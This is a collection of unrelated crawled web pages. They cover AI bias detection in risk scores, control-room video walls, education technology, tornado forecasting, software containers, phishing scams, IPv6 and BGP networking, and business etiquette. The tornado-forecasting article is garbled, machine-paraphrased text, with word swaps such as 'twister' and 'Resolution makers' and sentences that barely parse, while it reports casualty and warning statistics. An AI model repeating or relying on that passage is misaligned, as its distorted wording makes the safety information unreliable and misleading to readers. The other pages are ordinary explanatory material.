tricky choice with high-stakes implications. This latest development allows black-box AI users to retrain them with the actual outcomes. “Here, we train a transparent student model to mimic a black-box risk score teacher. We intentionally include all features that may or may not be originally used in the creation of the black-box risk score, even protected features, specifically because we are interested in examining what the model learns from these variables,” describes the report. “Then, we train another transparent model to predict the actual outcome that the risk score was intended to predict.” In other words, the black-box risk score (such as a credit score) is compared to the actual outcome (whether a loan defaulted). Any systematic differences between the risk scoring model and the actual outcome are then identified as bias – those variables from the initial data set that weren’t factors in the outcome. Tan and her colleagues trialed the method on loan risks and default rates from the peer-to-peer company LendingClub. It identified that the lender’s current model was probably also ignoring the purpose of the loans for which it was calculating risk – an important variable that has been proven to correlate with risk. They also tested their model against COMPAS, a proprietary score that predicts recidivism risk in the area of crime (and the subject of scrutiny for racial bias). Its proponents argue that it is race-blind – that is, not prejudiced – as it doesn’t use race as an input. However, ProPublica previously analyzed and released data on COMPAS scores and true recidivism outcomes of defendants in Broward County, Florida. They found that, “black defendants who did not recidivate over a two-year period were nearly twice as likely to be misclassified as higher risk compared to their white counterparts (45 percent versus 23 percent).” Tan’s model was able to back this up by demonstrating biases against certain age groups and races within COMPAS, while its own model, trained on the true outcomes, showed no evidence to support this. With further testing and development, Cornell University’s solution could serve to please everyone – from the institutions that employ AI, to the individuals that must live by their conclusions. Most importantly, it introduces transparency to critical AI models, while retaining accuracy. As we become ever more dependent on AI, across all walks of life, it’s vital that we understand how they reach conclusions – or we risk blind acceptance of prejudiced decisions.
<urn:uuid:4bf3f070-3890-49dc-8364-b524317c5800>
CC-MAIN-2022-40
https://internetofbusiness.com/research-reveals-dangers-prejudiced-ai/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00651.warc.gz
en
0.946759
1,099
2.984375
3
Control Room operators typically need to monitor large amounts of information and interact with mission-critical systems. This often requires the need for simultaneously presenting the operator with multiple video or HMI sources. In some environments desktop monitors and a single large screen display may be sufficient, in other environments a large-scale video wall with multiple screens may be required to better support situational awareness across multiple operators. There are essentially two ways to create a multi-window visual environment in a control room – with a multi-viewer or a video wall processor. Multi-viewers are generally purpose-built devices with embedded operating systems for viewing multiple windows on a single display. The number of windows typically ranges from 4-12. In the broadcast industry, multi-viewers scale to even more windows, but are more specialized in their video inputs and also display things like audio meters and advanced labelling. These broadcast-specific multi-viewers are not the subject here of comparison to video wall processors. A typical desktop multi-viewer will contain four images and ones used on larger displays might use more. Multi-viewers can be connected to any type of display device, including projectors, to create a single large, multi-window image. Since multi-viewers can display multiple windows, most support various types of layouts such as quadview, picture-in-picture, and windowed, and the window sizes can sometimes be adjusted as desired by the operator. Some advanced multi-viewers also support keyboard and mouse functionality so that the operator can have full KVM control of multiple sources displayed on a single screen, and some also might have more physical inputs than supported output windows which allows for a limited switching type of function. Multi-viewers generally support external control through either a serial or Ethernet interface to make basic operation easy through a push-button or touchpad device. A growing trend is for multi-viewers to also directly decode H.264 streams. Video Wall Processors Control room video wall processors behave similar to multi-viewers in creating a multi-window display, but are designed to create that output across a range of multi-display combinations such as 1x4, 2x3, 4x5, etc. Smaller scale video wall processors are generally designed around embedded operating systems while most of the large-scale video wall processors are designed around Windows platforms. IP-based platforms are also based on embedded operating systems. Centralized video wall processors are generally based on adding cards to one or more system chassis while distributed, IP-based processors are based on having one transmitter per source and one receiver per display. Either architecture can provide a highly scalable solution. Control room video wall processors support having essentially an unlimited number of windows based on practical viewing size, not just a pre-defined limit (i.e. 4-12) as is the case with multi-viewers. While video wall processors can also be controlled through an external control API by push-button and touchpad controllers for switching layouts and content sources, there is typically a separate user interface for managing the system that is more capable than an external control device. The software interface can support various levels of permissions with some advanced system options being limited to administrators, with users only controlling the video wall with external control devices. Multiple video walls can also be administered from a single system. Content sources can be duplicated multiple times inside the processor and displayed in different windows simultaneously with different parameters such as cropped, frame rate, color hue, etc. This enables subsets of content from a single source to be viewed in separate windows or on separate video walls. The larger-scale systems also have the capability to receive H.264 streams from hundreds of video cameras. And with so many sources to potentially view, content carousels can be configured to create groups of content that are rotated inside of a window with preset rotation timing between each source. In order to eliminate content gaps to display the next camera in the sequence, simultaneous decoding is performed on the active and next stream.In addition to user permission levels, some control room video wall processors also support activity logging to capture changes to the wall such as user log-ins, parameter configuration changes, layout changes, source switching, and more. General Comparison of Control Room Multi-viewers and Video Wall Processors Video Wall Processor # of windows Multiple wall control Windows or embedded External control interface Single- or Multi-chassis, or Distributed (IP)
<urn:uuid:35ea4944-2842-4860-b73e-02743a8e6a14>
CC-MAIN-2022-40
https://www.blackbox.com/en-be/insights/blogs/detail/technology/2017/01/10/key-considerations-for-choosing-a-control-room-multi-window-display-solution
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00651.warc.gz
en
0.903531
992
2.53125
3
Part 1: Move beyond the technology In honor of this week's ISTE conference — a premiere education technology conference in San Antonio, TX— I want to discuss how schools, educators and IT can provide students with the best conditions for success. It’s not about the technology. This defiant mantra is still prevalent in education. But why? While learning should be the leading driver for all discussions and decisions that impact student success, the topic of technology continues to taint our conversations. In order to support the individual needs of all learners, we must spend our time and resources wisely – not letting technology limit us or drive our decisions. Instead, we should allow the technology, specifically the device, to be a conduit that enables learning, embracing the fact that it’s an important tool in education. So why is there so much debate on this topic? Going back in time 20 years, we saw a very different picture. There was minimal discussion on technology in education. As we progressed through the years, people were willing to accept small steps forward as big improvements on this front. For instance, a teacher presenting material from their computer onto a screen was, by some, seen as notable technological progression in the classroom. The teacher-centered lecture model of technology had a new spin, yes, but it was the same old model. There are ways to take bigger, more impactful steps. Frameworks that could aid in this movement, like ACOT and TPACK, have been around a while. And in the early 2000s, LoTi, SAMR, 4Cs and TIMs emerged as evaluation models for technology integration. They shifted the focus to student-centered, high-level thinking. Now, with these powerful tools, we can move the discussion forward and reevaluate the main drivers of learning. Get past the limits of a technology Regardless of your current platform, or what you may adopt in the future, I suggest using an evaluation tool comparable to SAMR. By using rubrics that insist on the potential of the technology you implement, you can better understand the effect it has on learning. For instance, the founder of SAMR, Dr. Ruben R. Puentedura, believes in moving learning from simple substitution and augmentation to use cases that apply modification and redefinition of former practices. When it comes to implementing new technology, it’s important to fully evaluate how it will live in the classroom. Will your model meet each individual student’s needs? And will it grow with students as their maturity and knowledge base expand? As with SAMR, improving the technology implementation in your environment could consist of mass customization and an agile approach to moment-by-moment adjustments. Think of linking digital citizenship programs to students’ privileges on their devices. Instead of granting all students the same permissions, consider providing access to different applications or resources based on their actions. Support your digital equity efforts by focusing on customized learning environments for all students. With all of this in mind, let’s start a new discussion around technology that focuses on promoting measured progress and a gradual transformation, all while also tending to students’ dynamic needs. Have market trends, Apple updates and Jamf news delivered directly to your inbox.
<urn:uuid:f85c280f-0ddb-456f-b505-bc74decd59ab>
CC-MAIN-2022-40
https://www.jamf.com/blog/creating-the-conditions-for-student-success-part-1/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00651.warc.gz
en
0.93808
691
2.9375
3
When tornadoes touched down in Kentucky, Illinois, Arkansas, Missouri, Mississippi, and Tennessee over the weekend, residents and staff had solely 20 minutes of warning. Greater than 70 persons are identified to have died, however the demise toll is predicted to climb as first responders search the 200-mile lengthy path of the outbreak. However that’s in regards to the typical quantity of warning for a serious twister, which is forecasted 18 minutes earlier than touching down. Tornadoes kind alongside thunderstorms. However a thunderstorm solely spins off a twister underneath very particular situations. Wind on the floor and additional above must be shifting in reverse instructions. This causes the air between to spin in a horizontal tube. Then, the air on the bottom should be heat sufficient to tip that spinning tube off the bottom. And the storm above must tug on the highest of the now-vertical column, which permits it to develop. The central problem with predicting a twister’s path is that the climate occasions are extraordinarily native phenomena. Though Friday’s tornadoes moved greater than 200 miles, they have been lower than a mile vast. The typical width of a twister, in accordance to the Federal Emergency Management Agency, is simply round 400 yards, which is lower than 1 / 4 of a mile or about 4 soccer fields. (Which may sound large, however hurricanes, that are extra simply predicted, are often round 300 miles vast.) Climate forecasting fashions typically have a look at phenomena over sq. miles, and Wired reported in 2019 that superior twister modeling solely went right down to about 2 mile increments. That implies that forecasters can predict the situations the place tornadoes are capable of kind—particular storms, like supercells and hurricanes, are more than likely to spin them off—however are a lot much less good at understanding the place they may contact down. Figuring out the place they may transfer is one other hole. The pace of the storm, in addition to the dearth of data on upper atmospheric conditions that have an effect on the trail of the twister, make it exhausting to guess what’s going to occur as soon as it has fashioned. So forecasters must weigh false positives towards false negatives. In about 70 % of twister warnings between 2016 and 2020, no twister appeared, in keeping with information reported by Weather.com. (Watches are issued when the situations look proper for a vortex whereas warnings are issued when forecasters imagine one is imminent.) And since it’s so exhausting to know precisely the place a twister will transfer after it touches down, few individuals in a warning zone will truly be close to its eventual path. Nonetheless, forecasters are pretty profitable at predicting the worst occasions. A 2019 study discovered that 87 % of lethal tornadoes have been forecast prematurely, and 95 % of deaths befell in areas with lively twister warnings. Predicting how highly effective a twister will change into is tough, too. Twister watches merely say that one thing is coming, however don’t distinguish between a short twister with 100mph winds, and a monster that may obliterate buildings. “With hurricanes, communities will take totally different actions relying on whether or not a Class 1 versus a Class 5 storm is within the forecast,” atmospheric scientist Joshua Wurman wrote in a CNN essay on Sunday. “However with tornadoes, no such element exists—and folks might change into complacent to warnings, having skilled false alarms.” Within the case of this previous weekend’s storm, the demise toll appears to be highest the place employers didn’t act on the knowledge they got. And notably, NBC reported this afternoon that workers in a candle manufacturing facility in Mayfield, Kentucky, have been advised that they’d be fired in the event that they left early to take shelter. (Firm spokespeople dispute the account.) At the least eight individuals died when the manufacturing facility was destroyed. Insider reported a similar story at an Amazon warehouse in Edwardsville, Illinois. Six individuals died there on Friday night time. So whereas there are many false negatives, predictions are ok to let individuals know that they’re at risk. Resolution makers should be prepared to behave on that info.
<urn:uuid:b30c7fc3-35a7-48e4-aff9-929ce9d41a35>
CC-MAIN-2022-40
https://dimkts.com/why-its-so-difficult-to-forecast-a-tornados-path/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00051.warc.gz
en
0.948391
881
2.9375
3
What are the Benefits of Containerization? Containers are rapidly being adopted by organizations worldwide. According to Research and Markets, over 3.5 billion applications are currently running in Docker containers, and 48% of organizations are managing containers at large scale with Kubernetes. Containers have compelling advantages over the previous generation of virtualization technology. They are faster, more lightweight, and easier to manage and automate than virtual machines (VMs), and are phasing out VMs in many common scenarios. We’ll discuss the advantages of containers over VMs, compelling reasons to start using containers, and key requirements for successfully adopting containers in your organization. In this article, you will learn: Containers vs Virtualization Let’s briefly review the differences between traditional virtualization and containerization, to understand the compelling advantages of containers, and the reasons for their rapid adoption. What is the Difference Between Virtual Machines and Containers? Virtual machines (VMs), pioneered by VMware over two decades ago, are used by most large enterprises to build a virtualized computing environment. A virtual machine is an emulation of a physical computer. VMs make it possible to run several operating systems on one server, dramatically improving resource utilization of enterprise applications. VMs are managed by a software layer called a hypervisor, which isolates VMs from each other and allocates hardware resources to each VM. Each VM has direct or virtualized access to CPU, memory, storage, and networking resources. Each virtual machine contains a full operating system with applications and associated libraries, known as a “guest” OS. There is no dependency between the VM and the host operating system, so Linux VMs can run on Windows machines, and vice versa. Containers are an isolated unit of software running on top of an operating system (usually Linux or Windows). Unlike virtual machines, they only run applications and their dependencies. Containers do not need to run a full operating system on each instance—rather, they share the operating system kernel and gain access to hardware through the capabilities of the host operating system. This makes containers smaller, faster, and more portable, Like virtual machines, containers allow developers to increase CPU and memory utilization on physical machines. However, containers have taken it a step further. Related content: read our guide to Docker architecture › Use Cases in Which Containers are Preferred to Virtual Machines Here are three main scenarios in which containers provide compelling advantages compared to virtual machines: - Microservices—containers are highly suitable for a microservices architecture, in which applications are broken into small, self-sufficient components, which can be deployed and scaled individually. Containers are an attractive option for deploying and scaling each of those microservices. - Multi-cloud—containers provide far more flexibility and portability than VMs in multi-cloud environments. When software components are deployed in containers, it is possible to easily “lift and shift” those containers from on-premise bare metal servers, to on-premise virtualized environments, to public cloud environments. - Automation—containers are easily controlled by API, and thus are also ideal for automation and continuous integration / continuous deployment (CI/CD) pipelines. 7 Reasons to Adopt Containers in Your Organization Portability – Ability to Run Anywhere Containers can run anywhere, as long as the container engine supports the underlying operating system—it is possible to run containers on Linux, Windows, MacOS, and many other operating systems. Containers can run in virtual machines, on bare metal servers, locally on a developer’s laptop. They can easily be moved between on-premise machines and public cloud, and across all these environments, continue to work consistently. Resource Efficiency and Density Containers do not require a separate operating system and therefore use fewer resources. VMs are typically a few GB in size, but containers commonly weigh only tens of megabytes, making it possible for a server to run many more containers than VMs. Containers require less hardware, making it possible to increase server density and reduce data center or cloud costs. Container Isolation and Resource Sharing You can run multiple containers on the same server, while ensuring they are completely isolated from each other. When containers crash, or applications within them fail, other container running the same application can continue to run as usual. Container isolation also has security benefits, as long as containers are securely configured to prevent attackers from gaining access to the host operating system. Speed: Start, Create, Replicate or Destroy Containers in Seconds Containers are a lightweight package that everything needed to run, including its own operating system, code, dependencies, and libraries. You create a container image and then deploy a container in a matter of seconds. Once you have the image set up, you can quickly replicate containers and easily and quickly deploy as needed. Destroying a container is also a matter of seconds. The lightweight design of containers ensures that you can quickly release new applications and upgrades like bug fixes and new features. This often leads to a quicker development process and speeds up the time to market as well as operational tasks. Containers make it easy to horizontally scale distributed applications. You can add multiple, identical containers to create more instances of the same application. Container orchestrators can perform smart scaling, running only the number of containers you need to serve application loads, while taking into account resources available to the container cluster. Improved Developer Productivity Containers allow developers to create predictable runtime environments, including all software dependencies required by an application component, isolated from other applications on the same machine. From a developer’s point of view, this guarantees that the component they are working on can be deployed consistently, no matter where it is deployed. The old adage “it worked on my machine” is no longer a concern with container technology. In a containerized architecture, developers and operations teams spend less time debugging and diagnosing environmental differences, and can spend their time building and delivering new product features. In addition, developers can test and optimize containers, reducing errors and adapting them to production environments. Related content: read our guide to Docker in production › What is Needed for Successful Adoption of Containerization? Here is a checklist that can help you successfully containerize your applications: Setup and Design |Use fine-grained components||The smaller the unit, the easier it is to orchestrate. Break your components into fine-grained independent units. You should be able to design, deploy, scale, and maintain each unit independently.| |Prefer disposable components||When possible, design and build stateless and lightweight containers. This enables the orchestration platform to easily monitor and handle the container life cycle. However, if you do need to run stateful applications, you can do so using StatefulSets.| Security and Orchestration |Implement container security||It is critical to implement security measures and policies across the entire container environment, which includes container images, containers, the hosts, registries, runtimes, and your orchestrator. For example, use secrets to protect sensitive data and harden your environment.| |Leverage container orchestrators||Deploying containerized applications in production involves deploying, running, and managing a massive amount of containers—sometimes thousands, sometimes tens and hundreds of thousands. To efficiently manage containers, you need a container orchestration platform that provides automation and management capabilities for tasks like deployment, scaling, resource provisioning, and more. A popular open source option is Kubernetes.| Automation and Efficiency |Automate your pipeline| In addition to automating the orchestration of containers, you can also automate your entire development pipeline—or as many aspects of it as possible. Automation can help you quickly iterate and make any necessary changes. For this purpose, you can leverage a container orchestration platform as well as other tools that integrate well together. |Infrastructure as Code (IaC)||IaC lets you define various aspects of the infrastructure in declarative fies, which are used to automate the process. Container platforms often provide IaC capabilities that let you define the environment and turn it into the codebase. There are also tools that are dedicated to providing IaC capabilities for certain phases of the development pipeline, like security or resource optimization.| |Practice agile development||Agile methodologies help teams improve the development lifecycle by making it more efficient and breaking through silos. For example, DevOps, which stands for development and operations, helps ensure that development and operational tasks are handled quickly and effectively. This can significantly help teams that build and manage containerized environments.| |Promote a self-service developer experience||Teams should be able to independently provision their projects. This means collaborators need control over resources like code repositories and compute power, automation features, and access to image repositories. When providing access and privileges, be sure to use granular permissions.| Get started with containers with our in-depth guides:
<urn:uuid:4bce0635-1529-4684-967a-6e56101483f9>
CC-MAIN-2022-40
https://www.aquasec.com/cloud-native-academy/docker-container/container-advantages/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00051.warc.gz
en
0.917994
1,875
3.078125
3
A phishing campaign is an email scam designed to steal personal information from victims. Cybercriminals use phishing, the fraudulent attempt to obtain sensitive information such as credit card details and login credentials, by disguising as a trustworthy organization or reputable person in an email communication. Typically, a phishing campaign is carried out by email spoofing; an email directs the recipient to enter personal information at a fake website that looks identical to the legitimate site. Phishing emails are also used to distribute malware and spyware though links or attachments that can steal information and perform other malicious tasks. Phishing is popular with cybercriminals because it enables them to steal sensitive financial and personal information without having to break through the security defenses of a computer or network. Public awareness about phishing campaigns has grown considerably in recent years, as many incidents have been covered by a variety of media sources. In addition to technical solutions, user security awareness is one of the cyber security measures being used to help counter attempted phishing incidents. How a Phishing Campaign Works A phishing campaign uses social-engineering techniques to lure email recipients into revealing personal or financial information. For example, during the holidays, an email pretending to be from a well-known company tells you to go to its website and re-enter your billing information or your package won’t be shipped in time to make it your gift recipient. The only problem is that the fake email is directing you to a fake site, where the information you enter will be used to commit identity theft, fraud and other crimes. Types of Phishing Campaigns As businesses continue to deploy anti-phishing strategies and educate their users about cyber security, cybercriminals continue to improve phishing attacks and develop new scams. Here’s more information about some of the most common types of phishing campaigns. Spear phishing attacks are targeted at an individual or small group, typically with access to sensitive information or the ability to transfer funds. Cybercriminals gather information about the intended target in advance and leverage it to personalize the attack, create a sense of familiarity and make the malicious email seem trustworthy. Spear-phishing emails typically appear to come from someone the target knows, such as a co-worker at their company or another business in their network. Whaling is a spear-phishing attack that specifically targets senior executives at a business. Vishing, or voice phishing, uses a telephone message to try to get potential victims to call back with their personal information. Cybercriminals often use fake caller-ID information to make the calls appear to be from a legitimate organization or business. Smishing, also known as SMS phishing, uses text messages to try to lure victims into revealing account information or installing malware. See which threats are hiding in your inbox today. Our free Email Threat Scan has helped more than 12,000organizations discover advanced email attacks. START YOUR EMAIL THREAT SCAN While spam filters and other technology solutions can help prevent them from reaching inboxes, educating users about the dangers of phishing campaign emails is a critical component of cyber security for any organization. User security awareness training helps every employee recognize, avoid, and report potential threats that can compromise critical data and systems. As part of the training, mock phishing and other attack simulationions are typically used to test and reinforce good behavior. - White Paper: Best Practices for Protecting Against Phishing, Ransomware and Email Fraud - White Paper: Comprehensive Email Protection - Security Trend: Email Security Trends Special Report How Barracuda Can Help Barracuda Email Protection is a comprehensive, easy-to-use solution that delivers gateway defense, API-based impersonation and phishing protection, incident response, data protection, compliance and user awareness training. Its capabilities can prevent phishing attacks: Barracuda Impersonation Protection is an API-based inbox defense solution that protects against business email compromise, account takeover, spear phishing, and other cyber fraud. It combines artificial intelligence and deep integration with Microsoft Office 365 into a comprehensive cloud-based solution. Its unique API-based architecture lets the AI engine study historical email and learn users’ unique communication patterns. It blocks phishing attacks that harvest credentials and lead to account takeover, and it provides remediation in real time. Barracuda Security Awareness Training helps your business fight phishing and other social-engineering attacks by providing users with continuous simulation and training to understand the latest attack techniques, recognize subtle clues and help stop email fraud, data loss and brand damage. Have questions or want more information about Phishing Campaigns? Get in touch right now!
<urn:uuid:39c0e9fa-9a9a-4400-9d75-498d4a06f47c>
CC-MAIN-2022-40
https://www.barracuda.com/glossary/phishing-campaign?utm_source=51426&utm_medium=blog&utm_campaign=blog
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00051.warc.gz
en
0.926346
959
3.390625
3
According to AfriNIC, APNIC, ARIN, LACNIC and RIPE NCC statistics as published on their respective FTP servers, they gave out 165.45 million IPv4 addresses in 2005. Out of 3706.65 million usable IPv4 addresses, 1468.61 million are still available as of january 1, 2006. Read the article - posted 2006-01-01 Some people, such as D.J. Bernstein in his The IPv6 mess article and Todd Underwood in his Bashing IPv6 at TelecomNEXT blog post argue that the IETF made a critical mistake when creating IPv6 by not making the protocol "compatible" with IPv4. What they mean is that a system that only runs IPv6 can't communicate with a system that only runs IPv4. That indeed seems like a significant oversight: without this, it's necessary to run parallel networks for a long time, and there must be a significant amount of logic to determine which of the two protocols can and should be used for a particular communication session. The alternative seems so easy: just reserve some space for the 32-bit IPv4 address space somewhere in the enormous 128-bit IPv6 address space. For instance, IPv4 addresses could be expressed as IPv6 addresses where the first 96 bits are zero. This way, an IPv6 host host with address 0:0:0:0:0:0:c000:201 (which we are allowed to write down as ::192.0.2.1) can communicate with an IPv4 host with address 10.0.0.1 as long as somewhere along the way, there is a router or gateway that takes the IPv6 packet and transforms it into an IPv4 packet or the other way around, a fairly simple process. At the same time, our IPv6 host with address ::192.0.2.1 can communicate with another IPv6 host that has 3ffe:2500:310:4::1 (well, for the rest of today, at least...) as per IPv6 conventions. But... The problems start when 3ffe:2500:310:4::1 wants to communicate with 10.0.0.1. When the IPv6 packet arrives at the IPv6-to-IPv4 gateway, the 3ffe:2500:310:4::1 IPv6 address can't be translated into a 32-bit IPv4 address without loss of information. So hosts with "real" IPv6 addresses can't communicate with IPv4 hosts. Even worse, there is no way to determine whether a given IPv4-compatible address belongs to an IPv4 host or an IPv6 host. It gets really bad when a host can do IPv6, but it doesn't have IPv6 connectivity to the rest of the internet. The solution is to forget IPv4 compatible addresses for IPv6 hosts. If an IPv6 hosts is going to get an IPv4 address in the first place, it's much simpler to let the IPv6 host generate IPv4 packets where appropriate. So such a host would simply have an IPv6 address to communicate over IPv6 and an IPv4 address to communicate over IPv4. Communication between IPv6-only and IPv4-only hosts can be accomplished using a gateway as outlined above, with the addition of NAT functionality to allow multiple IPv6 hosts behind a gateway to share the gateway's IPv4 address. This is called NAT-PT (Network Address Translation - Protocol Translation) and it has the same downsides of regular NAT in that IPv6 hosts can connect to IPv4 servers, but not the other way around. So IPv6 is more compatible with IPv4 than many people think. Todd Underwood concludes that "IPv6 is dead, and I think pretty much everyone already knows it" and "I guess that's just about enough time for the stubborn IPv6 camp to admit they're wrong and for all of us to come together and make something that we can easily migrate to." It continues to amaze me in what a hurry people are to declare defeat. I think Todd and others who think along the same lines massively underestimate the amount of time and effort a project like this takes. It's debatable at what point IPv6 was (or will be) mature enough to replace IPv4, but I don't think anyone can seriously maintain that it reached this point before 2002. So that's at least 7 years between publication of the first RFCs and barely adequate. By extension, any new effort won't be ready before 2013. I also fail to see what the critical difference between IPv6 and any new protocol could be: obviously, it has to stay fairly close to the IP we know to avoid unnecessary complications (which IPv6 does, for the most part at least) and even more obviously, it must support longer addresses (which IPv6 certainly does). So how would the new protocol be so much better to warrant the effort?Permalink - posted 2006-06-06 FUJIFILM FinePix S9500 f/3.2, 1/42, ISO 200, 8.6 mm (2006:06:23 21:11:39) Image link - posted 2006-06-23 FUJIFILM FinePix S9500 f/4.1, 1/450, ISO 80, 39 mm (2006:08:13 19:51:13) Image link - posted 2006-08-13 Last week, ARIN, the organization in charge of distributing IP addresses in North America, changed its IPv6 address policy so it's now possible to get Provider Independent (PI) IPv6 address space. According to the ARIN Number Resource Policy Manual: This is both good news, and bad news. The good news is that if (in the ARIN region) you are currently connected to two or more ISPs for IPv4, you can now do this in much the same way with IPv6. Since IPv6 routing is almost identical to IPv4 routing, all of this should be fairly easy. However, since both the routing protocols (including BGP) and the rules for getting address space are now mostly the same, this means that in the future, IPv6 routing will suffer from the same problems that have been plaguing IPv4 inter-domain routing: a "global routing table" that is much larger than necessary, requiring network operators to invest in bigger routers and causing unnecessary instability. It also means that multihoming (the practice of connecting to two or more ISPs) will never be possible for truly large numbers of internet users. The Internet Engineering Task Force has been working on alternative ways to gain multihoming benefits in the multi6 and shim6 working groups. But the ARIN constituents decided not to wait for the completion of this work, which will likely have the effect that the shim6 mechanisms won't be adopted widely or quickly when they become available. One reason cited for moving ahead with a known problematic solution for multihoming was the statement by some organizations that they wouldn't adopt IPv6 in the absence of a multihoming solution. Prediction: they won't implement IPv6 with multihoming anytime soon either. And unfortunately ARIN (and the other RIRs) still claim that you can filter out any IPv6 prefixes longer than /32 even though they give out micro allocations and now PI blocks that are longer than that, mostly /48. See my article from nearly three years ago.Permalink - posted 2006-09-05 Iljitsch van Beijnum The Internet Protocol Journal, Vol. 9, no. 3, pp. 16-29, September The BGP TCP MD5 password mechanism (RFC 2385) is very useful to protect BGP sessions from attempts at unpleasantness by third parties. However, it is rather simplistic. One of the flaws is that there are no provisions for changing the password. In the old days, setting a new password for a neighbor would cause Cisco routers to tear down and reestablish the BGP session. Today, the session survives if the password or key is changed at more or less the same time at both ends. This requires a good deal of coordination. I must say that I can't remember anyone asking me to change an existing BGP password. But the security people insist that it's important to do this regularly, for instance, when employees leave. I think they have a different appreciation of the sensitivity of this key than those of us working in operations. Anyway, Steve Bellovin, a well-known member of the IETF, has written this "internet draft" and submitted it for publication as an RFC: http://www.ietf.org/internet-drafts/draft-bellovin-keyroll2385-03.txt (will be deleted after 6 months) What he proposes is that a router can have more than one active key so it's possible for one end to change keys and the other end to go along with this without the need to coordinate the password change very closely. Unfortunately, it's still possible to configure the wrong key, or forget to change the key after agreeing to do so, and then the BGP session will go down at some point, probably conveniently in the middle of the night. See my posting to the IETF discussion list for details. Well, progress isn't always progress, I guess. If you have any opinions on the matter, email me.Permalink - posted 2006-09-30 Canon PowerShot A40 f/4.5, 10/10, ISO ---, 13 mm (2006:10:29 18:21:59) Image link - posted 2006-10-29 The other day, I was sitting in a hotel lobby waiting for some people, working on my laptop. There I had the following conversation: “Hey, is there a wireless network here?” “Then how are you working?” “I’m working offline.” In this age of AJAX, webmail, instant messaging and YouTube videos working offline seems so 1980s. I guess this means I’m getting old, because I’m much more comfortable having my stuff (or at least, copies of my stuff) on local storage, so I have access to it regardless of my connectivity, and there is at least a fighting chance that an application that works today still works tomorrow. Interestingly, Microsoft, a company that makes billions selling software that makes computers useful whether or not they’re connected (Office), has jumped on the web-based applications bandwagon. Apparently they don’t see that web-based applications make Microsoft obsolete: all you need to run them is Linux and Firefox. Apple on the other hand, seems to focus on applications that work best locally. Long after the majority of Office users have switched to free or cheap web-based alternatives, possibly discarding Windows in the process, creative professionals (and hobbyists) will still be buying Apple hard- and software to do their audio, video and image editing. (Originally published on the Apress blog, which is now gone.)Permalink - posted 2006-11-06 If you want to use the BGP routing protocol, you need an Autonomous System number. These AS numbers were 16 bits in size until now, allowing for around 64000 ASes, and more than half of those have been given out already. To avoid problems when we run out of AS numbers, the IETF came up with modifications to BGP to allow for 32-bit AS numbers, as I explained in a posting about a year ago. Obviously, at some point someone has to bite the bullet and start using one of these new AS numbers. This bullet biting may happen fairly soon, as the five Regional Internet Registries have all adopted, or are in the process of adopting, the following policy: So what does this mean for people who run BGP today? Not all that much, really, because the changes to BGP to support the longer AS numbers are completely backward compatible. The only change is that you'll see the AS number 23456 appear in more and more places. In routers that don't yet support 32-bit ASes, the special 16-bit AS number 23456 shows up as a placeholder in places where a 32-bit AS is supposed to appear. If you have scripts that perform AS-related operations on the Routing Registries (such as the RIPE database), you'll have to adjust your software to parse the new format for 32-bit AS numbers. They are written down as <16bits>.<16bits>, for instance, 3.1099 is a new 32-bit AS number and 0.23456 is the 32-bit version of AS 23456. However, this format isn't standardized so 32-bit AS numbers may show up differently in your router. Have a look at the RIPE announcement. As soon as the first 32-bit AS number appears in the wild I'll report it here so you can check whether it shows up in its full 32-bit glory or as 23456. In the mean time, you may want to ask your router vendor for 32-bit AS support. At least one of the big vendors isn't implementing it in all of their lines just yet because they claim there is no customer demand for it. Permalink - posted 2006-12-29
<urn:uuid:e4d93175-f10d-49b1-8eb4-aa75a2b3f91a>
CC-MAIN-2022-40
http://all.iljitsch.com/2006/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00051.warc.gz
en
0.94959
2,784
2.625
3
There is more to prospering in a new role and building a solid, rewarding career than what is written in your resume. Or how you handle yourself in interviews. Ask any successful technologist, working in business means—working with other people. And that means understanding workplace etiquette: the unspoken rules that drive interpersonal dynamics. This understanding and our own application will influence how well – or poorly – we work with other people. First impressions are important wherever you are, whatever you are doing. And the workplace is no exception. Human beings often form first impressions of each other within seconds. And once an impression has been formed, it is hard to change it. If you are starting a new role, or going into a new company, meeting a new customer or team, take some time beforehand to think about how you want to be perceived. Do you want to project confidence? Authority? Do you want others to take you seriously, trust you, and feel straight away that you are dependable? First impressions hinge, oftentimes, on really simple things. Your Personal Signals Such as the way you stand, your body language, eye contact, how you are dressed, whether you smile when you meet someone, alertness, and punctuality. Each of these are cues and indicators that help you project personal attributes that will influence how other people perceive you as a professional. It is also important to understand the cultural norms for your region as business etiquette varies across the world. To help you better understand the rules of engagement, here are tips and hints to keep you straight in business etiquette – and well on track to success, wherever you are in your career. Advice on Improving Your Business Etiquette What is in a Name? Well, plenty. Successful people tend to be those who remember other people’s names. So make an effort to learn them. Repeating someone’s name a few times when you first speak to them, keeping business cards, writing names down in your diary – whatever works for you, remembering a name is a clear sign that you value a colleague, whether they are your superior or subordinate in the hierarchy. Give Respect by Default And talking of hierarchy, if you treat everyone with respect it’s a sign that you are not the kind of person to make judgment calls on the relative importance of the people you work with. Treating people with respect means many things – among them respecting other people’s privacy and personal space. Do not walk into someone’s office without knocking. Do not eavesdrop. Do not be the office gossip. Not only are you likely to cause harm to the people you gossip about, but also it will reflect badly on you. And remember to steer well clear of topics that may cause offence – chief among them: politics and religion. What are Words Worth? Communication. It is essential and yet fraught with all kinds of dangers and pitfalls. As a rule of thumb, re-read your email before you hit send. Every. Single. Time. So many misunderstandings and confusion can be caused by an innocent email. Try this too: avoid saying something in an email that you would not say directly to someone’s face. Re-reading that email will also help you spot any misspellings or typos that will reflect badly on you. And while you are at it, watch your tone. There is very rarely any excuse for bad language in a business context, but even using an informal register or slang can cause offence. If in doubt keep it neutral, keep it professional. Ask anyone who has worked in business for any length of time. There can be fewer things that convey a lack of respect for colleagues more emphatically than arriving late for a meeting. If you cannot avoid it, ring 